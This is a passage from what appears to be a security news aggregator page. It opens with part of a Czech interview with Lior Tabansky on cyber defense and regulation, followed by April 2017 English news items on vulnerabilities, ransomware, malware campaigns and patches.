Není zde rozdíl mezi útokem a obranou, je to stejná schopnost. Každá společnost vám řekne, že dělá obranu, ale technicky je to stejná schopnost. V organizaci potřebujete na útoky jisté změny, ale základy jsou stejné. Nemůžete dělat dobrou obranu, když nerozumíte tomu, jak probíhají útoky. Každá společnost, která nabízí obranná řešení, má velice dobré znalosti a možnosti v útočení.

V poslední době právě v Česku vedeme debaty o tom, zda vojenskému zpravodajství dát možnosti aktivně sledovat dění v sítích, právě s ohledem na možnosti aktivního zásahu. Měly by podobné organizace takové možnosti mít?
To je hodně složitá debata, je to velká věc v politikách kybernetické bezpečnosti. Jak nastavit balanc mezi bezpečností a svobodou. Není zde žádná formule, která by seděla na všechny země. Každá země si musí projít vlastní debatou.

Lior Tabansky
Autor: Jan Sedlák
Lior Tabansky
A měl byste pro naši zemi v tomto ohledu nějakou radu?
Hlavní radou je to, že než něco implementujete, na nejvyšší úrovni si nastavte, co chcete dělat v budoucnosti a k čemu přesně míříte. Co jsou kritické složky bezpečnosti, jaké jsou největší reálné hrozby. Toto bohužel často nebývá připraveno. Organizace čelí aktuálním hrozbám a pravidla aplikují na ně.

Když by naši zemi někdo napadl kybernetickým útokem, je to nějaký akt války? Za co to lze považovat a jak reagovat?
Je to těžké definovat. Přesně proto bychom měli být v uvažování velice flexibilní. Války se neustále mění, ale my zůstáváme myšlením ve starých definicích. V kybernetickém prostoru lze vidět řadu spolupráce mezi organizovaným kyberzločinem a státními složkami. Spolupracují na cílech pro obě strany – finanční zisk pro kyberkriminálníky a politický zisk pro státy podporované útoky. Není zde jednoduchá cesta pro definice, jednotné doktríny.

Je vůbec možné, aby právo a regulace reagovaly alespoň částečně tak rychle, jak se vyvíjí kybernetický prostor a hrozby v něm?
To je velký problém. V Izraeli jsme došli k tomu, že není jednotné řešení a koncepce. Snažíme se vybudovat ekosystém kybernetické bezpečnosti, což zahrnuje akademické instituce, soukromý sektor a vládu. Cílem je vybudovat ekosystém, který bude schopný se mnohem rychleji adaptovat než tradiční vládní procesy. Snažíme se dospět k tomu, aby se soukromý sektor byl schopný sám proaktivně adaptovat a nemusel čekat na akce z vrchu, od vlády. Změny se dějí strašně rychle a není možné držet s nimi krok při tradičním způsobu vládnutí.

Internet začal a dlouho byl velice svobodným prostředím, ovšem nyní čelí stále větším pokusům o regulaci. Právě bezpečnost slouží jako jeden z hlavních argumentů. Jaký vývoj můžeme čekat dál?
Je velice lákavé dělat další státní regulace, jak na obsah, tak infrastrukturu. Jedinou cestou, jak vše balancovat, je mít otevřenou demokratickou debatu a kontrolu nad tím, co vlády dělají. Není moc jiných cest.

Lior Tabansky
Autor: Jan Sedlák
Lior Tabansky
V knize Cybersecurity in Israel více rozebíráte, proč a jak vaše země kyberbezpečnost umí. Jde o již zmiňovaný výzkum a vývoj, dlouhodobé investice, propojení vládních, soukromých a akademických složek. Jak velký vliv pak na celé prostředí mají společnosti typu Check Point?
Velké společnosti mají v tom všem značnou roli. Nicméně z dlouhodobého pohledu mne více zajímají lidé. Vůbec nevadí, že většina startupů selže a spálí peníze. Dobrá stránka na tom je, že lidé získají více zkušeností a jsou ochotní a schopní je investovat do dalšího nápadu. To je to, co stojí za budoucností našich inovací. Pokud byste to chtěl měřit v oblasti prodejů a obchodů, je to samozřejmě jiný příběh.

Velké společnosti jsou vzory, ale nejsou to jediné vzory. Pokud takový Check Point udělá ročně tržby 1,7 miliardy dolarů, jsou zde i mladé firmy, které se prodají za miliardy dolarů či stovky tisíc dolarů. A v Izraeli jich není málo. To je také „big deal“ (smích).

V kybernetické bezpečnosti už se nějakou dobu debatuje o možném využití blockchainu. Vidíte už něco zajímavého?
Na univerzitě v Tel Avivu máme několik zajímavých výzkumných aktivit. Většina z nich ale ještě nelze použít na něco produkčního, jsou to základy. Je ještě brzy o něčem více mluvit, chce to hodně vývoje a trh si bude muset najít, jak vše využít a se vším pracovat. Potenciál je zde, ale ještě se musí zkoumat a experimentovat. Nevíme, jak to bude fungovat.

A co umělá inteligence? Zrovna zakladatel a výkonný ředitel Check Pointu Gil Shwed mi v rozhovoru říkal, že bez AI není možné v této oblasti fungovat.
To je zcela správně řečeno. Hlavní výhodou počítačů je, že mohou automatizovat mnoho úloh. Jsme a budeme schopní lidi osvobodit od základních operací a nechat je pracovat na inovativních a kreativních věcech. Kybernetická bezpečnost je o datech, hodně datech. Na to potřebujete strojové zpracování.

Může mít AI v kyberbezpečnostních technologiích nějaké dopady na legislativu a vše kolem? Co když bude mít AI vliv na mezinárodní dění?
Ano, to je problém práva. To je důvod, proč oddělujeme robotiku, AI, automatizaci od exekutivních rozhodnutí. Válečný letoun dnes v podstatě dokáže sám útočit a podobně, ale pořád tato rozhodnutí necháváme na lidech. Přesně kvůli problémům, které jste zmiňoval.

Můžou všechny ty nastupující věci jako Internet věcí, robotika, Průmysl 4.0 a tak dále výrazně změnit pohled na kybernetickou bezpečnost?
Teoreticky ano, budou zde některé hluboké změny. Nicméně reakce bude v podstatě stejná. Víme, že změny přicházejí, a nevíme, jaké je řešení. Největší šancí se s tím vyrovnat je mít systém, který se rapidně rozvíjí a adaptuje se. To je ideální model. Kolem toho ale samozřejmě bude mnoho práce – řešení zákonů, ekonomické implikace a tak dále.


Microsoft Finally Reveals What Data Windows 10 Collects From Your PC
6.4.2017 thehackernews Privacy
Since the launch of Windows 10, there has been widespread concern about its data collection practices, mostly because Microsoft has been very secretive about the telemetry data it collects.
Now, this is going to be changed, as Microsoft wants to be more transparent on its diagnostics data collection practices.
Till now there are three options (Basic, Enhanced, Full) for Windows 10 users to select from under its diagnostics data collection section, with no option for users to opt out of sending their data to Microsoft.
Also, the company has never said precisely what data it collects behind these options, which raised huge privacy concerns among privacy-conscious users.
But now for the first time, Microsoft has revealed what data Windows 10 is collecting from your computer with the release of the Windows 10 Creators Update, bringing an end to nearly two years of its mysterious data collection practices.
The Windows 10 Creators Update, which will be available from April 11 for users to download for free, comes with a revamped Privacy settings section.

During the process of upgrading to the Creators Update, you will be displayed a new Privacy Settings screen that will ask you to toggle the following features:
Location – Allow Windows and apps to request your location and share that data with Microsoft.
Speech Recognition – Allow Cortana and Windows Store apps to recognize your voice and send that data to Microsoft to improve speech recognition.
Tailored experiences with diagnostic data – Allow Microsoft to use diagnostic data from your computer to offer tips and recommendations.
Relevant ads – Allow apps to use advertising IDs to show ads more interesting to you based on your app usage.
What's more? On Wednesday, Microsoft published a massive list of diagnostics data – both the Basic and Full levels of diagnostics – on its TechNet site, showing what data gets collected.
Basic – The Basic level collects a limited set of data that is critical for understanding the device and its configuration. This data includes basic device information, quality-related information, app compatibility, and Windows Store.
Full – The Full level collects data for the following nine categories: common data; software setup and inventory data; product and service usage data; browsing, search and query data; content consumption data; linking, typing, and speech utterance data; and licensing and purchase data.

Windows chief Terry Myerson said in a blog post published Wednesday that Microsoft hoped the transparency would allow users to make "more informed choices" as the company starts rolling out its new Creators update to the operating system.
This more transparency in gathering diagnostic data after two years of the Windows 10 release is likely Microsoft's response to European Union regulators that's publicly pressuring the company about its privacy practices for the past year.
In February, European Union regulators said they're still unsatisfied with the privacy changes announced by Microsoft and seeking further clarification from the company.
Marisa Rogers, the privacy officer of the Microsoft's Windows and Devices Group, said that the company is planning to "share more information about how [it] will ensure Windows 10 is compliant with the European Union's General Data Protection Regulation."


No More Ransom — 15 New Ransomware Decryption Tools Available for Free
6.4.2017 thehackernews Virus
No More Ransom, so is the Ransomware Threat.
Launched less than a year ago, the No More Ransom (NMR) project has increased its capacity with new partners and new decryption tools added to its now global campaign to combat Ransomware.
Started as a joint initiative by Europol, the Dutch National Police, Intel Security and Kaspersky Lab, No More Ransom is an anti-ransomware cross-industry initiative to help ransomware victims recover their data without having to pay ransom to cyber criminals.
The online website not just educates computer users to protect themselves from ransomware, but also provides a collection of free decryption tools.
Since December, more than 10,000 victims from all over the world have been able to decrypt their locked up devices without spending a penny, using ransomware decryption tools available free of charge on this platform.
Statistics show that most of the website visitors were from Russia, the Netherlands, the U.S., Italy, and Germany.
The platform is now available in 14 languages and hosts 40 free decryption tools, supplied by a range of member organizations, which can be used by users to decrypt their files which have been locked up by given strains of ransomware.

No More Ransom initiative has been joined by thirty new organizations, including Avast, CERT Polska and Eleven Paths (the Telefonica Cyber Security Unit), which shows that the threat is a worldwide issue that needs to be fought together.
The initiative has also welcomed new law enforcement organizations from Interpol, Australia, Belgium, Israel, South Korea, Russia, and Ukraine.
Since December 2016, 15 new ransomware decryption tools have been added to the online portal by partner organizations, offering more decryption possibilities to the victims:
AVAST: Alcatraz Decryptor, Bart Decryptor, Crypt888 Decryptor, HiddenTear Decryptor, Noobcrypt Decryptor and Cryptomix Decryptor
Bitdefender: Bart Decryptor CERT Polska: Cryptomix/Cryptoshield decryptor
CheckPoint: Merry X-Mas Decryptor and BarRax Decryptor
Eleven Paths: Telefonica Cyber Security Unit: Popcorn Decryptor.
Emsisoft: Crypton Decryptor and Damage Decryptor.
Kaspersky Lab: Updates on Rakhni and Rannoh Decryptors.
Previously available in English, Dutch, French, Italian, Portuguese and Russian, the No More Ransom site has now added new languages including Finnish, German, Hebrew, Japanese, Korean, Slovenian, Spanish and Ukrainian.
More languages are also expected to be made available soon to assist victims across the world better.


Cisco Patches Critical Flaw in Aironet Access Points

6.4.2017 securityweek Vulnerebility
Cisco published an advisory on Wednesday to warn customers that some of the company’s Aironet access points are affected by a critical flaw that could allow an attacker to take complete control of a vulnerable device.

The security hole, tracked as CVE-2017-3834, involves the existence of default credentials that can be used by a remote attacker who has layer 3 connectivity to log in to a device with elevated privileges via SSH.

The vulnerability impacts Cisco Aironet 1830 and 1850 series APs running an 8.2.x version of the Mobility Express software prior to 8.2.111.0. The company pointed out that the weakness can be exploited regardless of whether the device is configured as a master, subordinate or standalone AP.

Cisco has also informed customers of a medium severity shell bypass vulnerability affecting Aironet 1800, 2800 and 3800 series APs. A local attacker with root privileges can exploit the flaw to gain root access to the underlying Linux operating system. This root shell is designed only for advanced troubleshooting and it should not be available to any user, even if they have root privileges.

The networking giant has also published advisories detailing three high severity denial-of-service (DoS) vulnerabilities affecting its Wireless LAN Controller (WLC) software.

These security holes affect the Wireless Multimedia Extensions (WME), IPv6 UDP ingress packet processing, and the web management interface components of the WLC software. Remote or adjacent attackers can exploit the flaws without authentication.

Cisco has released software updates for each of the affected WLC versions. Workarounds are not available.

Most of these vulnerabilities were discovered by Cisco itself and the company said there was no evidence of exploitation in the wild.


Be careful, Cisco Mobility Express is shipped with some Cisco Aironet devices has a hard-coded password. Fix it!
6.4.2017 securityaffairs Vulnerebility

The Mobility Express Software shipped with Cisco Aironet 1830 Series and 1850 Series access points has a hard-coded admin-level SSH password.
Yesterday I wrote about SCADA systems that are currently shipped with an unchangeable hard-coded password, and today I’m here to discuss you a similar problem.

The Mobility Express Software developed by the IT giant CISCO that is shipped with Aironet 1830 Series and 1850 Series access points has a hard-coded admin-level SSH password.

Cisco Aironet Cisco Mobility Express

The presence of default credentials could be exploited by attackers to remotely exploit a “layer 3 connectivity to an affected device”.

“A vulnerability in Cisco Aironet 1830 Series and Cisco Aironet 1850 Series Access Points running Cisco Mobility Express Software could allow an unauthenticated, remote attacker to take complete control of an affected device.” reads the security advisory. “The vulnerability is due to the existence of default credentials for an affected device that is running Cisco Mobility Express Software, regardless of whether the device is configured as a master, subordinate, or standalone access point. An attacker who has layer 3 connectivity to an affected device could use Secure Shell (SSH) to log in to the device with elevated privileges. A successful exploit could allow the attacker to take complete control of the device”

To discover which release of Cisco Mobility Express Software is running on your device you can use the Cisco Mobility Express wireless controller web interface or the CLI.
The release number is available in the section under the web interface under Management > Software Update.

The security advisory published by the company is part of a wider set that addresses security issued for the Aironet 1830/1850 series.

The problem affects every access point running the 8.2.x release of Cisco Mobility Express Software prior to Release 8.2.111.0., regardless of whether the device is configured as a master, subordinate, or standalone access point.

CISCO has released free software updates that fixed the flaw described in the advisory. It is important to remind that customers may only install and receive support for software versions for which they have purchased a license.

Other security issues related the Aironet technology are:

An input validation bug in the Cisco Wireless LAN Controller (WLC);
An IPv6 UDP denial-of-service (DoS) vulnerability in the WLC; and
A DoS vulnerability in the WLC’s management GUI.
Cisco has already issued security fixes to patch the above problems.


United Cyber Caliphate published a kill list of 8,786 individuals in US, UK
6.4.2017 securityaffairs CyberCrime

Members of the United Cyber Caliphate (UCC) pro-ISIS hacker group has released a new kill list with 8,786 targets in US, UK
The pro-ISIS hacking group United Cyber Caliphate (UCC) has released a “kill list” containing the names and addresses of 8,786 individuals in the U.S. and UK. The group published a shocking video online calling for lone wolf attacks on the individuals in the list.

“Kill them wherever you find them.” states the message published by the United Cyber Caliphate (UCC).

The video starts with a warning for the United States:

“We have a message to the people of the U.S. and most importantly your President Trump,” the text on the screen reads.

“Know that we continue to wage war against you. Know that your counter attacks only make us stronger. The UCC will start a new step in this war against you,” the message said.

According to according to the terror monitor SITE, the United Cyber Caliphate (UCC) first announced the release of the kill list through a private group on Telegram, then published it after a few minutes.

“More than 7,000 of the names were from the U.S.,” a source from the cyber department at SITE told Fox News on Wednesday.

“We’re trying to determine where the list came from and also identify a common theme among all the individuals,” states a spokesman from SITE.

United Cyber Caliphate

Intelligence experts are evaluating the real danger for the people included in the kill list, in the past, the same group of hackers has shared other lists.

“This group has released several ‘kill lists’ in the past and so far there’s been no confirmed incident of someone on the list being directly targeted or attacked,” the source said.

On March 16, 2017, the United Cyber Caliphate (UCC) published a video to announce the death of it leader, Osed Agha, who was killed during a US airstrike. The video promised retaliation for the death of the UCC leader.

Pierluigi Paganini

(Security Affairs – Kill list, United Cyber Caliphate)

View image on Twitter
View image on Twitter
Follow
TRACterrorism.org @TRACterrorism
United Cyber Caliphate Announces Death of Osed Agha (Hacker IS Kill-List Creator)http://ow.ly/1nSU30a2SiQ
2:05 PM - 19 Mar 2017


Crooks took control over operations of a Brazilian bank for 5 hours
5.4.2017 securityaffairs CyberCrime

Cyber criminals launched a sophisticated cyber heist that compromised the entire DNS infrastructure of a major Brazilian Bank.
A cyber criminal organization took over online service of a major Brazilian bank for five hours. The hackers compromised the bank DNS system and intercepted all the connections to the financial institution.

According to Kaspersky Lab who investigated the incident, the attack was very sophisticated, attackers used a valid SSL digital certificates and Google Cloud to support the phony bank infrastructure.


Kaspersky Lab did not disclose the name of the bank that was victim of the attack.Crooks compromised 36 domains belonging to the bank, including internal email and FTP servers.
The hackers took control of the bank’s DNS account after they have compromised the bank’s Domain Name Service (DNS) provider Registro.br.

It is still unclear how hackers compromised the DNS provider, but the experts believe the cyber attacks began at least five months prior to the day of the hack.

The attack occurred on October 22, 2016 and lasted five hours during which the attackers captured the transaction of hundreds of thousands or possibly millions of the bank’s customers worldwide. When the bank customers tried the accessed the online services offered by the bank they were infected with a malware posing as a Trusteer banking security plug-in application.

The malware was designed to disable victim’s security solutions and steal login credentials, email contact lists, and email and FTP credentials.

The experts explained that it is the first time they observed a so massive attack.

“As far as we know, this type of attack has never happened before on such a big scale,” explained Dmitry Bestuzhev, director of Kaspersky Lab’s research and analysis team in Latin America.

The experts at Kaspersky highlighted the DNS provider Registro.br fixed a cross-site request forgery flaw on its website in January, it is possible the attackers have exploited the flaw for the attack.

“Maybe they [the attackers] exploited the vulnerability on that website and got control. Or … We found several phishing emails targeting employees of that registrar, so they could have spear-phished them,” added Kaspersky. “We don’t know how exactly they originally compromised” the DNS provider, he says.

A disconcerting aspect of the story is the fact that the Brazilian bank didn’t enable the two-factor authentication option implemented by Registro.br.

The malicious code targets a specific list of other banks in many countries, including Brazil, US, the UK, Japan, Portugal, Italy, China, Argentina, and the Cayman Islands.

The attackers used a modular malware that could infect both Windows and Mac OSs.

The malware was identified as Trojan-Downloader.Java.Agent; Trojan.BAT.Starter; not-a-virus:RiskTool.Win32.Deleter; and Trojan-Spy.Win32.Agent.

The crooks also launched a phishing campaign against specific bank clients during the five-hour attack.

The stolen information was sent by hackers to a server in Canada,

Kaspersky suspects the involvement of a sophisticated Brazilian cybercrime gang.

“They spent five months just waiting. This is not someone who is a newbie,” added Bestuzhev.


ClearEnergy ransomware aim to destroy process automation logics in critical infrastructure, SCADA and industrial control systems.
5.4.2017 securityaffairs ICS

Schneider Electric, Allen-Bradley, General Electric (GE) and more vendors are vulnerable to ClearEnergy ransomware.
Researchers at CRITIFENCE® Critical Infrastructure and SCADA/ICS Cyber Threats Research Group have demonstrated this week a new strain of ransomware attack aiming to erase (clear) the ladder logic diagram in Programmable Logic Controllers (PLCs). The ransomware a.k.a ClearEnergy affects a massive range of PLC models of world’s largest manufacturers of SCADA and Industrial Control Systems. This includes Schneider Electric Unity series PLCs and Unity OS from version 2.6 and later, other PLC models of leading vendors include GE and Allen-Bradley (MicroLogix family) which are also found to be vulnerable to the ransomware attack.

Ransomware is a type of malware that infects computers and encrypts their content with strong encryption algorithms, and then demands a ransom to decrypt that data. “ClearEnergy attack is based on the most comprehensive and dangerous vulnerability that ever found in Critical Infrastructure, SCADA and ICS Systems, and affects a wide range of vulnerable products from different manufacturers and vendors. These attacks target the most important assets and critical infrastructure and not just because they are easy to attack but also hard to be recovered”. Says Brig. Gen. (ret.) Rami Ben Efraim, CEO at CRITIFENCE.

In 2016 we have seen a rise in ransomware, where the victims were businesses or public organizations that on one hand had poor security and on the other hand the alternative cost of losing business continuity was high. Last year there were reports of a targeted ransomware for PC and other workstation within critical infrastructure, SCADA and industrial control systems. A month ago, scientists from the School of Electrical and Computer Engineering in Georgia Institute of Technology have simulated a proof-of-concept ransomware attack (LogicLocker) in a limited scope designed to attack critical infrastructure, SCADA and industrial control systems.

ClearEnergy acts similarly to other malicious ransomware programs that infect computers and encrypts their content with strong encryption algorithms, and then demands a ransom to decrypt that data back to its original form, with one major difference. ClearEnergy is a malicious ransomware attack designed to target Critical Infrastructure and SCADA systems such nuclear and power plant facilities, water and waste facilities, transportation infrastructure and more.

“Although the codename ClearEnergy, the vulnerabilities behind ClearEnergy ransomware takes us to our worst nightmares where cyber-attacks meets critical infrastructure. Attackers can now take down our electricity, our water supply and our oil and gas infrastructure by compromising power plants, water dams and nuclear plants. Critical Infrastructure are the place in which terrorists, activists, criminals and state actors can make the biggest effect. They have the motivation, and ClearEnergy shows that they have also the opportunity.” Says Brig. Gen. (ret.) Rami Ben Efraim, CEO at CRITIFENCE.

Once ClearEnergy is executed on the victim machine it will search for vulnerable PLCs in order to grab the ladder logic diagram from the PLC and will try to upload it to a remote server. Finally ClearEnergy will start a timer that will trigger a process to wipe the logic diagram from all PLCs after one hour unless the victim will pay in order to cancel the timer and to stop the attack.

SCADA and Industrial Control Systems has been found to be weak in the recent years, against numerous types of attacks that result in damages in a form of loss of service which translate to a power outage, or sabotage. The damage that ClearEnergy attack can cause to the critical infrastructure is high since it can cause a power failure and other damages to field equipment, thus making the recovery process slow in most cases, and might even bring a plant to a halt.

ClearEnergy, which is based on vulnerabilities CVE-2017-6032 (SVE-82003203) and CVE-2017-6034 (SVE-82003204) that have been discovered by CRITIFENCE security researchers, disclosed profound security flaws in the UMAS protocol of the vendor Schneider Electric. UMAS protocol seems to suffer from critical vulnerabilities in the form of bad design of the protocol session key, which results in authentication bypass. “UMAS is a Kernel level protocol and an administrative control layer used in Unity series PLC and Unity OS from 2.6. It relies on the Modicon Modbus protocol, a common protocol in Critical Infrastructure, SCADA and industrial control systems and used to access both unallocated and allocated Memory from PLC to SCADA system. What worries our researchers is that it may not be entirely patched within the coming years, since it affecta a wide range of hardware and vendors.” Says Mr. Eran Goldstein, CTO and Founder of CRITIFENCE.

Following to the disclosure, Schneider Electric has confirmed that the Modicon family of PLCs products are vulnerable to the findings presented by CRITIFENCE and released an Important Cybersecurity Notification (SEVD-2017-065-01). ICS-CERT, Department of Homeland Security (DHS) released an important advisory earlier this morning. The basic flaws, which was confirmed by Schneider Electric, allows an attacker to guess a weak (1-byte length) session key easily (256 possibilities) or even to sniff it. Using the session key, the attacker is able to get a full control of the controller, to read controller’s program and rewriting it back with the malicious code.

“The recovery process from this type of cyber-attacks can be very hard and slow in most cases due to lack of management resources in the field of SCADA and process automation. Slow recovery process multiplied by the number of devices need be fixed, as well configuration restoration makes the recovery processes very painful”. Says Mr. Alexey Baltacov, Critical Infrastructure Architect at CRITIFENCE

ClearEnergy

“Recovering from such an attack would be a slow and tedious process, and prone to many failures. Every plant using PLC’s which is part of a production line and would have dozens of these devices all around the plant. Let’s assume that each PLC is indeed backed-up to its recent configuration. It would take a painstakingly long time to recover each and every one of them to its original status.” Says Mr. Eyal Benderski, Head of the Critical Infrastructure and SCADA/ICS Cyber Threats Research Group at CRITIFENCE. “This restoration process would take a long time, on which the plant would be completely shut down. The costs of that shut down could be substantial, and for critical processes it could affect for more than the down-time, as it is the case with energy plants. Consider a process which relies on keeping a constant temperature for a biological agent or chemical process. Breaking the process chain could require re-initialization that may be days and weeks long. Furthermore, since dealing with the OT network is much more complicated for operational reasons, on many occasions plants don’t even have up-to-date backups, which would require complete reconfiguration of the manufacturing process. Given these complications, plants would very much prefer paying the ransom than dealing with the minor chance that the backups will work as expected. Lastly, let’s assume the backups went on-air as soon as possible, what would prevent the same attack from recurring, even after paying?”

About the author:


CRITIFENCE is a leading Critical Infrastructure, SCADA and Industrial Control Systems cyber security firm. The company developed and provides SCADAGate+ unique passive cyber security technology and solutions designed for Critical Infrastructure, SCADA and Industrial Control Systems visibility and vulnerability assessment, which allow to monitor, control and to analyze OT network cyber security events and vulnerabilities easily and entirely passively. CRITIFENCE development team and Critical Infrastructure and SCADA/ICS Cyber Threats Research Group combined from top experienced SCADA and cyber security experts and researchers of the IDF’s Technology & Intelligence Unit 8200 (Israel’s NSA) and the Israeli Air Force (IAF).

For more information about CRITIFENCE refer to: http://www.critifence.com


Google Patches 31 Critical Flaws in Android

5.4.2017 secureweek Vulnerebility

Google this week released security updates for Android to resolve numerous Critical remote code execution (RCE) and elevation of privilege (EoP) vulnerabilities in the platform.

Over 100 vulnerabilities were resolved in Android this month, split into two separate sets of patches. A total of 23 bugs were addressed with 2017-04-01 security patch level, including 6 Critical vulnerabilities, 9 rated High risk and 8 Moderate.

There were 6 Critical RCE issues affecting Mediaserver; High risk flaws such as EoPs in CameraBase, Audioserver, and SurfaceFlingerș Information disclosure in Mediaserver; and denial of service (DoS) vulnerabilities in libskia and Mediaserver.

The Moderate severity issues included EoP bugs in libnl and Telephony, along with Information disclosure vulnerabilities in Mediaserver, libskia, and Factory Reset. Overall, Google patched 15 flaws in Mediaserver this month, which proves once again that this is one of the most vulnerable components in Android, after the Stagefright bug was found in it almost two years ago.

The 2017-04-05 security patch level resolves a total of 79 vulnerabilities, 25 of which were rated Critical severity, 39 have a High rating, and 15 are considered Moderate risk, Google’s advisory reveals.

One of the most severe of these vulnerabilities was a RCE issue in Broadcom Wi-Fi firmware. Tracked as CVE-2017-0561 and found by Google Project Zero researcher Gal Beniamini, the issue impacts Nexus, Samsung, and smartphones from other vendors as well. Apple’s iOS was also impacted by the bug, and the company released an emergency fix for it earlier this week.

19 other Critical issues were addressed in various Qualcomm components and were released as part of Qualcomm AMSS security bulletins between 2014 and 2016 (a 20th vulnerability considered only High risk was also counted here in Google’s advisory).

The rest of the Critical flaws included RCE issues in kernel networking subsystem and Qualcomm crypto engine driver, along with EoP bugs in MediaTek touchscreen driver, HTC touchscreen driver, and kernel ION subsystem.

The remaining 38 High risk vulnerabilities in this patch level were mostly EoP bugs in kernel sound subsystem, and various drivers, but 2 RCE flaws (in v8 and Freetype), four information disclosure issues (in kernel memory and kernel networking subsystems, Qualcomm TrustZone, and Qualcomm IPA driver), and two DoS flaws (in kernel networking subsystem and Qualcomm Wi-Fi driver) were also resolved.

The 15 Moderate risk issues included EoP and information disclosure issues in various drivers from Qualcomm, Broadcom, and Nvidia (one EoP was addressed in HTC OEM fastboot command and one information disclosure was resolved in kernel media driver).


Flaws in Java AMF Libraries Allow Remote Code Execution

5.4.2017 secureweek Vulnerebility
Deserialization-related vulnerabilities found in several Java implementations of AMF3 can be exploited for unauthenticated remote code execution and XXE attacks, warned CERT/CC.

The security holes were reported to CERT/CC and vendors by Markus Wulftange, senior penetration tester at Code White. Patches have been made available for some of the affected products.

Serialization is the process where an object is converted to a stream of bytes in order to store or transmit that object to memory or a file. The process in which serialized data is extracted is called deserialization and it can lead to significant security flaws if not handled properly.

AMF3, the latest version of Adobe’s Action Message Format, is a compact binary format used to serialize ActionScript object graphs. AMF was first introduced in Flash Player 6 in 2001 and AMF3 has been around since Flash Player 9.

There have been several reports in the past few years about remote code execution vulnerabilities introduced in Java-based applications due to inadequate serialization implementations.

Wulftange has discovered that some Java implementations of AMF3 deserializers introduce potentially serious vulnerabilities, allowing unauthenticated attackers to remotely execute code or cause a denial-of-service (DoS) condition. An XXE flaw reported by the researcher can also lead to disclosure of sensitive data on the server.

CERT/CC’s advisory mentions three vulnerabilities. The first flaw allows an attacker who can spoof or control an RMI (Remote Method Invocation) server to execute code. This security hole is said to affect Atlassian’s JIRA, Exadel’s Flamingo, GraniteDS, Spring spring-flex, and WebORB for Java by Midnight Coders.

The second vulnerability can also be exploited for arbitrary code execution by an attacker who can spoof or control information. This weakness impacts Flamingo, Apache’s Flex BlazeDS and GraniteDS. The XXE flaw has been found to affect the same products along with WebORB.

Some of the vulnerable libraries, such as GraniteDS and Flamingo, have been discontinued. Atlassian and Apache have released patches for the flaws impacting their products.

According to CERT/CC, products from HPE, SonicWall and VMware could also be affected. The organization has advised developers to use versions of JDK that implement serialization blacklisting filters and ensure that their products properly handle deserialized data from untrusted sources.


Cyberspies Target Middle East With Windows, Android Malware

5.4.2017 secureweek Android
A cyberespionage group apparently not linked to any previously known threat actor has been using several Windows and Android malware families in attacks aimed at organizations in the Middle East.

The first report on this group’s activities was published last month by Chinese security firm Qihoo 360, which tracks the actor as APT-C-23 and Two-Tailed Scorpion. Researchers at Palo Alto Networks and ClearSky have also conducted a joint investigation into the gang’ operations.

According to the security firms, the group uses Windows and Android malware to spy on victims. Qihoo 360 said it observed nearly 85 percent of infections in Palestine, followed by Israel, but Palo Alto also reported seeing victims in Egypt and the United States.

As for the types of organizations targeted, Qihoo reported that educational institutions appeared to be the main target, followed by military organizations, while Palo Alto mentioned media companies.

Palo Alto Networks and ClearSky have dubbed the Windows malware families used by these cyberspies KASPERAGENT and MICROPSIA. The Android threats are being tracked as SECUREUPDATE and VAMP.

The attackers delivered their malware using fake news websites and spear-phishing emails containing Bit.ly shortened links. Two of the Bit.ly links analyzed by researchers had been clicked hundreds of times.

KASPERAGENT, named so based on a “Kasper” string found in several of the analyzed samples, is used as a reconnaissance tool and downloader for other payloads. However, some of the samples include additional capabilities that allow the hackers to steal passwords from Chrome and Firefox, take screenshots, log keystrokes, execute arbitrary commands, exfiltrate files, and update the malware.

The second Windows malware family used by Two-Tailed Scorpion is MICROPSIA, which allows attackers to log keystrokes, capture screenshots, and steal Office documents.

Researchers initially found no connection between the two malware families, but they eventually uncovered a link: an email address used to register the command and control (C&C) domains.

Some of the domains registered with that email address were also found to host Android malware disguised as harmless applications. One of them is SECUREUPDATE, a backdoor that acts as a downloader for other malware.

The second Android malware is VAMP, which can record calls, harvest contact information, access messages, and steal documents from the infected device.

Both the Android and Windows malware attacks also involve phishing websites that attempt to trick users into handing over their credentials.

Palo Alto has discovered roughly 200 samples of the Windows malware and 17 Android malware samples. The security firm has been monitoring the threat since March 2016, but the KASPERAGENT malware had been used since at least July 2015.

“Through this campaign there is little doubt that the attackers have been able to gain a great deal of information from their targets,” explained Palo Alto Networks researchers. “The scale of the campaign in terms of sheer numbers of samples and the maintenance of several different malware families involved suggests a reasonably sized team and that the campaign is not being perpetrated by a lone wolf, but rather a small team attackers.”


Researchers Disclose Unpatched Flaws in Schneider Electric PLCs

5.4.2017 secureweek Vulnerebility
Researchers have disclosed the details of two vulnerabilities affecting some of Schneider Electric’s Modicon programmable logic controllers (PLCs) after the vendor failed to provide any status updates or feedback.

A team of experts from Germany-based OpenSource Security discovered the flaws in Schneider’s Modicon M221 PLCs, namely TM221CE16R running firmware version 1.3.3.3.

According to advisories published on Tuesday by the researchers, the vulnerabilities are critical and they can be easily exploited.

One of the flaws is related to the fact that the Project Protection feature, designed to prevent unauthorized access to project files, uses a hardcoded encryption key.

The project’s password is stored in an XML file that is encrypted using the AES algorithm in CBC mode. The problem is that the encryption key is the same for all systems and it cannot be changed, allowing an attacker to decrypt the XML file and obtain the password set by the user.

The password can then be used to access and modify a project via SoMachine Basic, the software designed for programming Modicon controllers.

The second vulnerability is related to the Application Protection feature, which prevents the transfer of an application from a PLC to a SoMachine Basic project. Researchers discovered that sending a simple command via Modbus to the controller on TCP port 502 will return the Application Protection password in clear text.

The password can be used via the SoMachine software to download applications from the controller, modify them and upload them back to the device.

The researchers said they reported their findings to Schneider Electric on December 23, but the only information they got from the vendor was the confirmation that the vulnerability report had been received.

Contacted by SecurityWeek, Schneider Electric admitted making a mistake and promised to share mitigation advice for these flaws as soon as possible on its cybersecurity support portal.

“Schneider Electric acknowledges the security note on its product Modicon TM221CE16R, Firmware 1.3.3.3, disclosed by OpenSource Security,” the company said in an emailed statement.

“Conscious about user Cyber Security concerns, Schneider Electric places a high priority on the evaluation of security research as it becomes available and produces documentation to advise users on mitigations that can be taken if they are required. Because of an issue in our standard process for interactions with cybersecurity advisory & consulting firms, we have missed the opportunity to respond to the researchers from OpenSource Security (Simon Heming, Maik Brüggemann, Hendrik Schwartke, Ralf Spenneberg) and offer mitigation to users, and we do apologize for this. We’re reviewing and updating our processes to make sure such a situation never happens again,” the company added.

Schneider Electric recently notified customers about the availability of patches and mitigations for three vulnerabilities affecting some of its Modicon PLCs.


Lazarus Under The Hood
5.4.2017 Kaspersky CyberCrime
Download full report (PDF)

